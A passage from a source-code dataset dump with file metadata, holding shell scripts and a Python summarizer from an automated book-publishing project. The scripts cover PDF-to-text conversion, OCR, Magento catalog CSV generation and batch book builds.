file3.write(i+'\\n')\n file3.close\n" }, { "alpha_fraction": 0.7330677509307861, "alphanum_fraction": 0.737051784992218, "avg_line_length": 14.6875, "blob_id": "8af5de99552fb16937bad4e72612cfc4d5e10f36", "content_id": "7fdc83bae7b9d4a58fc7918cfd86068129b235eb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 251, "license_type": "permissive", "max_line_length": 52, "num_lines": 16, "path": "/scripts/pdfdir2txt.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# convert all pdfs in current directory to txt\n\n# needs to be portabilized\n# needs native recursion\n\n\nfor file in *.pdf\ndo\n\tpdftotext $file\n\techo \"converted \"$file \"to txt\"\ndone\necho \"done converting PDFs in this directory to txt\"\nexit\n0\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7282230257987976, "avg_line_length": 40, "blob_id": "58e65942a2da67e4c9ccc046ca5b298819a7ef00", "content_id": "9b429c19442d677a3df05c6b22f47f8221fff54d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 574, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/scripts/bin/tesseract-test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\nSTARTPAGE=1 # set to pagenumber of the first page of PDF you wish to convert\nENDPAGE=121 # set to pagenumber of the last page of PDF you wish to convert\nSOURCE=book.pdf # set to the file name of the PDF\nOUTPUT=book.txt # set to the final output file\nRESOLUTION=600 # set to the resolution the scanner used (the higher, the better)\n\ntouch $OUTPUT\nfor i in `seq $STARTPAGE $ENDPAGE`; do\n convert -monochrome -density $RESOLUTION $SOURCE\\[$(($i - 1 ))\\] page.tif\n echo processing page $i\n tesseract page.tif tempoutput\n cat tempoutput.txt >> $OUTPUT\ndone\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.811170220375061, "avg_line_length": 375, "blob_id": "0b2c813957e1d88df3ae992a270ced57c457a6b6", "content_id": "8c5125492ae5392667ec804491f6e534711581d1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 376, "license_type": "permissive", "max_line_length": 375, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/NanoBot.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "NanoBot is a big fan of all things Nano. He likes to follow 2D materials and graphene, Laser plasmonics and Qubit research, and novel metallic alloys and organic polymers. Anything to do with Consumer Electronics at the nano level will be part of his daily research. 
NanoBot looks forward to the latest conference reports and hopes to see everyone at next years CES in Vegas.\n" }, { "alpha_fraction": 0.592079222202301, "alphanum_fraction": 0.592079222202301, "avg_line_length": 49.5, "blob_id": "6a8546b6d25d8660a63b790408e39dd41e5ccb7e", "content_id": "789cd638ba7e773f406b94b93a41089802194f84", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 505, "license_type": "permissive", "max_line_length": 169, "num_lines": 10, "path": "/scripts/includes/SEO-module.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# SEO module\n\nseoseed=$(echo \"$seed\" | sed -e 's/\"/_/g' -e 's/#/ /g' -e 's/\\&/ /g' -e 's/'\\''/_/g' -e 's/, /_/g' -e 's/,/_/g' -e 's/\\//_/g' -e 's/ /_/g' -e 's/\\\\/ /g' -e 's/|/_/g')\necho \"seoseed is\" $seoseed\n\ncat assets/pk-html-adsense.js > tmp/$uuid/seo-cumulative.html\ncat tmp/$uuid/cumulative.html >> tmp/$uuid/seo-cumulative.html\ncp tmp/$uuid/seo-cumulative.html $APACHE_ROOT\"pk-html/\"$seoseed\".html\"\n\necho \"ran SEO module and exported seo-cumulative.html to \"$APACHE_ROOT\"pk-html/\"$seoseed\".html\"\n" }, { "alpha_fraction": 0.7012360692024231, "alphanum_fraction": 0.7073661088943481, "avg_line_length": 25.7446231842041, "blob_id": "9ca1d0f3bb1b83b49f5d50dd256524362cf452d5", "content_id": "41e95ec6fbc83916a3dc43eb6c6fb0924bb56ee7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 9951, "license_type": "permissive", "max_line_length": 310, "num_lines": 372, "path": "/scripts/includes/metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "sku=`tail -1 < $LOCAL_DATA\"SKUs/sku_list\"`\necho \"sku\" $sku\n\necho \"starting to write metadata to \" $metadatatargetpath | tee --append $sfb_log\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nnews_from_date=$createtime\n\n(( news_from_date = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from_date +'%m/%d/%y%n %H:%M:%S'`\n\n(( news_to_date = createtime + 7862400 ))\n\nnews_to_date=`date -d @$news_to_date +'%m/%d/%y%n %H:%M:%S'`\n\n# Adjust the timestamp above by number of minutes given\n\nminutes=$special_lasts_minutes\n\nspecial_lasts_sec=$(( $minutes * 60))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec >> $sfb_log\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" $special_to >> $sfb_log\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'` >> $sfb_log\n\necho \"book is new from at \" $news_from_date >> $sfb_log\n\necho \"book is no longer new at \" $news_to_date >> $sfb_log\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n#store\n\necho -n \"admin,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"base,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"Default,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"downloadable,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#sku\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# 2 is Nimble Combinatorial Publishing category\n\necho -n 
$categoryid\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#name based on seed terms\n\nproductname=$covertitle\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $productname >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url key n/a\n\n echo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift message available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\n\necho -n $covertitle \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta description\n\necho -n \"foo,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n#image filename\n\necho -n $slash$uuid/$sku\"cover.png,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small image filename\n\necho -n $slash$uuid/$sku\"cover.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#thumbnail filename\n\necho -n $slash$uuid/$sku$\"cover.png,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# options container\n\necho -n \"Product Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#samples title \n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links title \n\necho -n $escapeseed \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#url path below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# image label below\n\necho -n $escapeseed \" cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $escapeseed \" small cover,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $escapeseed \"cover thumbnail,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n#custom design below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"no layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n. includes/pricing.sh\n\necho -n \"$price\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat tmp/$uuid/longdescription.html | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#short description below\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat tmp/$uuid/shortdescription.html | sed -e 's/\"/_/'g | sed -e '/\\<html/d' | sed -e '/\\<body/d' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\",'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#meta keywords below\n\necho -n '\"'>> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# . 
includes/keyword-reader\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n ',' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#custom layout update below\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status below\n\necho -n \"Enabled,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# taxable class\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# catalog visibility\n\necho -n '\"Catalog, Search\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable google checkout\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#links purchased separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#minimum quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured minimum quantity\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#is the quantity decimal?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# will backorders be accepted\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration for backorders?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the minimum sale quantity?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#use configured value for min sale qty?\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#what is the maximum sale quantity?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configured value for maximum sale quantity?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is the product in stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a low stock date?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should we notify on given stock quantity\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"current-import.csv\"\n\n# use configuration value on notifying stock quantity\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage the stock?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use configuration value for managing stock?\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# should the stock status be changed automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the product name\n\necho -n $escapeseed \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is there a special store id\n\necho -n \"'$specialstoreid',\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n \n# what is the product type id?\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has the product status changed?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the value of product_changed_websites\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier prices\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#associated products\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#adwords grouped \n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#downloadable options\n\n# note that file path is relative to media/import because 
that's where Magento (not SFB) assumes the file will be\n\n\nif [ \"$targetformats\" = \"epubonly\" ] ; then\n\t\n\techo \"targetformats is\" $targetformats\n\n\techo $epublinkname \n\n\techo -n '\"'$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub,''\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nelse\n\n\techo -n '\"'$epublinkrichname,0,9,file,$uuid/$sku'linkrich.epub'$pipe$docxname,0,9,file,$uuid/$sku'.docx'$pipe$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub'$pipe$mobilinkname,0,9,file,$uuid/$sku'.mobi'$pipe$pdflinkname,0,9,file,$uuid/\"$sku\"print_color.pdf'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nfi\n \n\n# echo additional columns\n\n#echo -n $special_price\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#echo -n $special_from_date\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#echo -n $special_to_date\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $editedby '\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $seedsource '\",' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $news_from_date >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $news_to_date >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $editorid >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n $wordcount >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \",,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#product tags were here\n\n# . includes/keyword-reader\n\n\necho \"finished writing metadata for this book \"$booktype\" on \" $seed | tee --append $sfb_log\n\necho \"SKU was \"$sku | tee --append $sfb_log\n\necho \"wrote metadata to \"$metadatatargetpath$uuid\"/current-import.csv\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.6766610145568848, "alphanum_fraction": 0.6862010359764099, "avg_line_length": 30.52688217163086, "blob_id": "6c48f4422db528acf3ce598c703a5b85db287c53", "content_id": "768893ef9ee773f493207f87eb01324262d10993", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2935, "license_type": "permissive", "max_line_length": 404, "num_lines": 93, "path": "/scripts/bin/build_n_books_from_csv.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# loops over csv metadata file with n data rows to build n books \n\n# initialize variables\n\n# needs $1 = path to data file $2 number of rows \n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n. includes/set-variables.sh\nif [ ! 
\"/tmp/pagekicker/buildresult\" ] ; then\n\trm /tmp/pagekicker/buildresult\nelse\n\ttrue\nfi\n\n\n#create batch uuid\n\necho \"creating batch_uuid\"\nbatch_uuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\nbatch_uuid=\"batch_\"\"$batch_uuid\"\necho \"batch_uuid is\" $batch_uuid | tee --append $xform_log\nmkdir -p -m 777 $TMPDIR$batch_uuid\n\necho \"abt to enter main loop\"\nrow_no=$2\n# main read & build loop\ni=1\necho \"number of rows to parse is $row_no\"\nwhile [[ \"$i\" -le $row_no ]]; do\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\tmkdir -p -m 777 $TMPDIR$uuid\n\tmkdir -p -m 777 $TMPDIR$uuid/seeds\n\tmkdir -p -m 777 $TMPDIR$uuid/csv\n\n\t\"$PYTHON_BIN\" $scriptpath\"bin/csvreader.py\" \"$1\" \"$uuid\" $i\n\n\techo \"getting ready to run catalog entry creation command for row $row_no\"\n\t#catid=$(cat $TMPDIR$uuid/csv/row.catid)\n\tbooktitle=$(cat $TMPDIR$uuid/csv/row.booktitle)\n\teditedby=$(cat $TMPDIR$uuid/csv/row.editedby)\n\t#jobprofile=$(cat $TMPDIR$uuid/csv/row.jobprofile)\n\tseeds=$(cat $TMPDIR$uuid/csv/row.seeds)\n\timprint=$(cat $TMPDIR$uuid/csv/row.imprint)\n\t#echo '\"' > $TMPDIR$uuid/csv/row.add_this_content\n\tadd_this_content=$(cat $TMPDIR$uuid/csv/row.add_this_content)\n\t# add_this_content='\"'$add_this_content'\"'\n\t#echo '\"' >> $TMPDIR$uuid/csv/row.add_this_content\n\techo \"add_this_content is $add_this_content\"\n\t#price=$(cat $TMPDIR$uuid/csv/row.price)\n\techo \"booktitle is $booktitle and editedby is $editedby\"\n\techo \"seeds are:\"\n\techo \"$seeds\"\n\tsed -e 's/\\^/\\n/g' $TMPDIR$uuid/csv/row.seeds > $TMPDIR$uuid/csv/seeds\n\n\n\n\tif [ \"$2\" = \"ccc_off\" ] ; then\n\t\techo \"not running ccc\"\n\telse\n\t\tbin/create-catalog-entry.sh --format \"csv\" --passuuid \"$uuid\" --booktitle \"$booktitle\" --booktype \"Reader\" --covercolor \"Random\" --coverfont \"Minion\" --environment \"$environment\" --jobprofilename \"default\" --seedfile \"$TMPDIR$uuid/csv/seeds\" --builder \"yes\" --imprint \"$imprint\" --batch_uuid \"$batch_uuid\" --editedby \"$editedby\" --yourname \"no\" --summary \"both\" --add_this_content \"$add_this_content\"\n \n#--categories \"$catid\" not implemented\n# --book_description \"$description\" ditto\n\tfi\n\techo \"exit value is $?\"\n\tif [ \"$?\" -eq 0 ] ; then \n\t\ttrue\n\telse\n\t\techo \"exiting with error\"\n\t\texit 1\n\tfi\n\n\ti=$(( i + 1 ))\n\techo \"i is $i\"\n\ndone\n\nzip $TMPDIR$batch_uuid/batch $TMPDIR$batch_uuid/*.epub $TMPDIR$batch_uuid/*.mobi $TMPDIR$batch_uuid/*.docx\necho \"zipped all deliverables in $TMPDIR$batch_uuid/batch.zip\"\necho \"completed building $row_no new titles\"\n\nexit 0\n\n\n\n" }, { "alpha_fraction": 0.7275421619415283, "alphanum_fraction": 0.7492020130157471, "avg_line_length": 22.70810890197754, "blob_id": "db09008755fb1c5f487ebb6dc9387511c91739e4", "content_id": "5943fde41b9a3eb8c92451675f33f0418d0aa6c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4386, "license_type": "permissive", "max_line_length": 161, "num_lines": 185, "path": "/scripts/includes/set-variables-template.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "abstracts=\"both\"\nadd_corpora=\"no\"\nadd_imprint_biblio=\"yes\"\nadd_this_content_part_name=\"User-Provided 
Content\"\nadd_this_content=\"none\"\nafterKWIC=\"5\"\nanalyze_url=\"no\"\nangbr=\"<\"\narxiv=\"no\"\nattribute_set=\"Default\"\nauthorphoto=\"authorphoto.png\"\nbackmatter=\"on\"\nbeforeKWIC=\"3\"\nBISAC_code=\"None\"\nbody=\"<body>\"\nbold=\"<b>\"\nbooktitle=\"\"\nbooktype=\"Reader\"\nbooktypewebformid='\"/item/booktype\"'\nbreaking=\"no\"\nbuild_all_formats=\"yes\"\nbuild_bw_pdf=\"yes\"\nbuild_color_pdf=\"yes\"\nbuild_docx=\"no\"\nbuild_linkrich_epub=\"yes\"\nbuild_mobi=\"yes\"\nbuild_text_epub=\"yes\"\nbuild_txt_html_only=\"no\"\nbuilder=\"yes\"\nbuildtarget=\"$mediatargetpath\"\ncategories=\"4\"\ncategoryid=2\ncloseparen=\")\"\ncover_image_extension=\".png\"\ncoverbase=\"images/bottomcanvas.png\"\ncovercolor=\"black\"\ncoverfile=\"assets/NCP-cover.jpg\"\ncoverfont=\"Georgia\"\ncoverfontcolor=\"white\"\ncoverRGB=\"0,0,0\"\ncovertype_id=\"1\"\ncustomer_email=\"[email protected]\" # chsnge to your organization\ncustomeridwebformid='\"/item/customerid\"'\ncustomtitle=\"none\"\ndaily_email_post_to_wp=\"no\"\ndaily_email_post_to_wp_status=\"draft\"\ndedicationfilename=\"default.html\"\ndedicationfilename=\"default.html\"\ndescription=\"test\"\ndocsandabstracts=\"'<b>Document titles and abstracts:</b><p>'\"\ndocxlinkname=\"Microsoft_Word_docx\"\ndocxname=\"Microsoft_Word_docx\"\ndontcleanupseeds=\"yes\"\ndq='\"'\nebookformat=\"epub\"\nebookintro=\"includes/ebook.intro.html\"\neditedby=\"PageKicker\" # chsnge to your default author\neditorid=\"1\"\nendanchor=\"/a>\"\nendbody=\"</body>\"\nendbold=\"</b>\"\nendbr=\">\"\nendhead=\"</endhead>\"\nendhtml=\"</html>\"\nendp=\"</p>\"\nendurl=\"&prop=links&pllimit=500&format=xml\"\nepub=\".epub\"xmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nepublinkname=\"ePub\"\nepublinkrichname=\"Pub\"\nexemplar_file=\"none\"\nexemplar_filedir_code=400 # this is the field code value used in the directory structure where magento webforms stores uploaded exemplar files -- softcoded below\nexpand_seeds_to_pages=\"no\"\nfb_announcement=\"no\"\nfetcharray=()\nfetched_document_format=\"html\"\nfetchfile=\"fetch/fetchlist.csv\"\nfirstname=\"\"\nfleet=\"yes\"\nflickr=\"no\"\nflickr=\"off\"\nfrontmatter=\"on\"\ngoogler_on=\"no\"\ngoogler_news_on=\"no\"\nh1=$angbr\"h1\"$endbr\nh1end=$angbr$slash\"h1\"$endbr\nh2=$angbr\"h2\"$endbr\nh2end=$angbr$slash\"h2\"$endr\nh3=$angbr\"h3\"$endbr\nh3end=$angbr$slash\"h3\"$endbr\nhead=\"<head>\"\nhtml=\"<html>\"\nhttpvalidate='(https?|ftp|file)://[-A-Za-z0-9\\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\\+&@#/%=~_|]'\nimgsrc=\"<IMG SRC=\"\nimport=\"no\"\nimprint=\"pagekicker\" # overridden by --imprint parameter at cli\nISBN_assign_automatically=\"no\"\nISBN_owner=\"0\"\nISBN=\"012345679X\"\njobprofilename=\"default\"\nlastname=\"\"\nLSI_import=\"yes\"\nmailtofred=\"yes\"\nmaximages=\"4\" #default\nmiddlename=\"\"\nmobilinkname=\"Kindle\"\nmontageur=\"off\"\nmontageurdir=\"montageur\"\nmylibrary=\"yes\"\nnameprefix=\"\"\nnegative_seed_weight=1\nnegative_seeds=\"\"\nnewline=\"/n\"\nnews_lasts_minutes=\"43200\"\nnews_to_buffer=\"2592000\"\non=\" on \"\nopenanchor=\"<a href=\"$dq\nopenparen=\"(\"\noutfile=\"montage.jpg\"\np=\"<p>\"\npass_uuid=\"no\"\npdflinkname=\"PDF\"\npdfserif=\"MinionWebPro\"\npipe=\"|\"\npositive_seed_weight=1\npositive_seeds=\"\"\nprice=0.99\nprintconfigfile=\"yes\"\nrefresh=\"yes\"\nrobot_location=\"Ann Arbor, Michigan, USA\" # change to your 
location\nrobot_summary_length=10\nrows=1\nsample_tweets=\"no\"\nscreen_numbered_seeds=\"no\"\nseedfile=\"\"\nseedfortheday=\"\"\nseedsource=\"PageKicker\"\nSEOmodule_status=\"off\"\nseriesdescriptionfilename=\"default.html\"\nshortform=\"no\"\nsingleseed=\"\"\nsingleseedwebformid='\"/item/singleseed\"'\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\nslash=\"/\"\nslidebodyfont=\"DejaVu-Sans\" #Decimator\nspecial_lasts_minutes=\"43200\"\nspecial_price=\"0\"\nspecial_to_buffer=\"2592000\"\nspecialstoreid=\"0\"\nsq=\"'\"\nstatus=\"Enabled\"\nstopimagefolder=\"none\" #default\nstorecode=\"admin\"\nstoreids=\"0\"\nsubtitle=\"\"\nsummarizer_ngram_threshold=2\nsummarizer_on=Y\nsummary_length=10\nsummary=\"both\"\ntext_extraction_on=\"yes\"\nthumbxsize=120 #default\nthumbysize=120 #default\ntldr=\"\"\ntop_q=\"20\" # number of nerv lines used divided by 2\ntoplabelfont=\"Utopia\" # #Decimator must be available font\ntoplabelfontname=\"Utopia\" #Decimator\ntxtformatname=\".txt\"\ntxtwildcard=\"*.txt\"\ntwitter_announcement=\"no\"\ntwo1=\"no\"\ntype=\"downloadable\"\nuserdatadir=\"none\"\nuserdescription=\"no\"\nuserid=\"1\"\nuserlogo=\"assets/imprint.png\"\nverbose=\"no\"\nvisibility=\"Catalog,Search\"\nwebsites=\"base\"\nwikilocale=\"en\"\nwordcount=0\nwordcountpages=0\nwordcountsummaries=0\nx=\"x\" # for imagemagick scripts\nxmlstarletwebformstart=\"xmlstarlet sel -t -v\"\nxpathwebformid='\"/item/webform_id\"'\nyourname=\"no\"\n" }, { "alpha_fraction": 0.5987081527709961, "alphanum_fraction": 0.6056222915649414, "avg_line_length": 37.84098815917969, "blob_id": "fb87898fb7ae0d3939aefc6f6b1bc33aa9187f37", "content_id": "4b8bd72e7eab45727039f9a8082090f3fe7823a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10992, "license_type": "permissive", "max_line_length": 147, "num_lines": 283, "path": "/scripts_python_3/bin/PKsum-clean.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#\n# PKsumv6.py\n# Goal: implement biased LexRank for either single docs or a multi doc corpus\n# called as python PKsumv3.py text_path_or_file\n# By Jeffrey Herbstman, 7-15-2013\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# optional inputs:\n# posseed - seed string for positively biased LexRank\n# negseed - seed string for negatively biased LexRank\n# stopfile - file containing custom stopwords\n# length - int - length (in lines) of summary\n# seed_posweight - weights the positive seed similarity score\n# seed_negweight - weights the negative seed similarity score\n# ngrams - allows ngram measurements\n#\n# Outputs:\n# single file with name provided as input (see above)\n#\n#Options to possibly add:\n# - normalization: right now the cosine similarity measure incorporates a\n#normalization method. 
I'm not sure how to sub in a different, still effective\n#method instead of that\n# - Stemming\n#\n###################################################\nimport scipy, numpy, codecs, os\nimport sys, nltk, collections, sklearn.feature_extraction.text, networkx, time\nimport scipy.spatial.distance\nimport biased_lexrank\nimport argparse\n\n\n#==================================================\n#defines a class consisting of a list of sentences pulled from the text doc\nclass Corpus:\n def __init__(self, input_text):\n self.documents = self._index_docs(input_text)\n\n def ls(self, path):\n return [os.path.join(path, item) for item in os.listdir(path)]\n\n def file_read(self, input_text):\n with open(input_text, encoding='utf-8', errors='replace') as docfile:\n doc = docfile.read()\n\n #Sentence tokenizing\n doc = ' '.join(doc.strip().split('\\n'))\n sentence_tokenizer = nltk.PunktSentenceTokenizer()\n sentences = sentence_tokenizer.tokenize(doc)\n return sentences\n\n def _index_docs(self, input_text):\n sentences = []\n try:\n sentences = self.file_read(input_text)\n except IOError:\n for f in self.ls(input_text):\n single_doc_sentences = []\n single_doc_sentences = self.file_read(f)\n sentences.extend(single_doc_sentences)\n\n #removes arbitrarily long lists\n sentences = [sent for sent in sentences if sent.count(',') < 12]\n\n return sentences\n\n\n\n#==================================================\n#creates a Term-Document Matrix for the corpus\nclass TDM:\n def __init__(self, corpus, posseed, negseed, stopfile, norm_flag, ngram):\n\n #Normalization flag encoding\n if norm_flag == 'True':\n norm_opt = 'l2'\n else:\n norm_opt = None\n\n #Stopword encoding\n if stopfile == None:\n stop_words = 'english'\n else:\n with codecs.open(stopfile, encoding='utf-8') as f:\n stop_words = f.read()\n\n if posseed == None and negseed == None:\n self.matrix = self._gen_matrix(corpus, stop_words, norm_opt, ngram)\n else:\n self.matrix = self._gen_matrix_seeded(corpus, posseed, negseed, stop_words, norm_opt, ngram)\n\n\n\n def _gen_matrix(self, corpus, stop_words, norm_opt, ngram):\n\n #TDM generator\n count_vec = sklearn.feature_extraction.text.CountVectorizer(\n stop_words, ngram_range=(1, ngram))\n try:\n term_matrix = count_vec.fit_transform(corpus)\n except ValueError:\n print(\"This document isn't 